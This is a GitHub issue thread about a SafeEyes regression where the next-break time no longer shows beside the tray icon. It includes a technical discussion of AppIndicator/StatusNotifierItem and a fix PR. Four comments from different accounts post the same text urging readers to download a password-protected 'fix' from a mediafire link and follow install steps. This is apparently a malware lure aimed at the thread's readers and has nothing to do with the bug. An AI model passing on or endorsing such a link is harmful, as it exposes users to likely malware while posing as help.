### ISSUE TITLE
"Show next break time in tray icon" isn't working

### ISSUE THREAD

**Issue by AdamPS** [slgobinath/SafeEyes#643]
**Describe the bug**
After a recent upgrade, the setting "Show next break time in tray icon" isn't working 

**To Reproduce**
Click on settings, select plugins, open Tray Icon settings and enable "Show next break time in tray icon". Nothing happens, I don't see the time.

Original issue included two other problems that are actually long-standing bugs
A: Click on settings, select plugins, and disable the Tray Icon. The tray icon remains visible, and safeeyes becomes disabled.
C. Click on settings, leave the window open, focus another window on top of it. Click on settings again. Nothing happens.

**Expected behavior**
I see the time adjacent to the tray icon.

A: The tray icon is removed.
C: The settings window comes to the front and is visible.

**Desktop (please complete the following information):**
 - Ubuntu 24.04
 - GNOME
 - Version 2.2.2

**Debug Log**
Run the Safe Eyes using `safeeyes --debug` command attach the ~/safeeyes.log` file.

**Screenshots**

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AdamPS** [comment]
The current code tries to put the time in a tooltip, but that's not really right. We don't want to have to hover to see the time. Anyway tooltips seem to be [unsupported](https://github.com/ubuntu/gnome-shell-extension-appindicator/tree/master?tab=readme-ov-file#missing-features) in AppIndicator.

The previous code used `indicator.set_label()`

However [StatusNotifierItem](https://www.freedesktop.org/wiki/Specifications/StatusNotifierItem/StatusNotifierItem/) seems to be missing a function for label.

**Comment by AdamPS** [comment]
Please can the main contributors for the issue that caused this regression join the discussion here?
@archisman-panigrahi @deltragon

**Comment by deltragon** [comment]
@AdamPS I have a PR up that should hopefully fix this: #646

**Comment by deltragon** [comment]
Regarding C - at least on KDE Plasma, there's a method to integrating xdg-activation into the tray icon ("ProvideXdgActivationToken"). Looking at [this](https://github.com/ubuntu/gnome-shell-extension-appindicator/blob/master/interfaces-xml/StatusNotifierItem.xml), it seems the GNOME extension supports it too.
IIUC, this maps to the [GtkWindow.set_startup_id](https://docs.gtk.org/gtk4/method.Window.set_startup_id.html) method, which at least for GTK4 supports xdg-activation.
I'll look into it, but it might make sense to track in a different issue.

**Comment by AdamPS** [comment]
Great thanks. I confirm that the PR works on Gnome.

**Comment by archisman-panigrahi** [comment]
Sorry about my silence in my past two weeks. I can test the PRs tonight.
@deltragon Can you please suggest the order in which I can test/merge the existing PRs?

**Comment by deltragon** [comment]
@archisman-panigrahi #646 is probably the highest priority.

**Comment by archisman-panigrahi** [comment]
@AdamPS Can you please edit out A and C out of this? I was initially super confused about whether #646 is about A and C or not.

**Comment by AdamPS** [comment]
Great thanks for the fix.

> Please create a separate issue for A.

#654
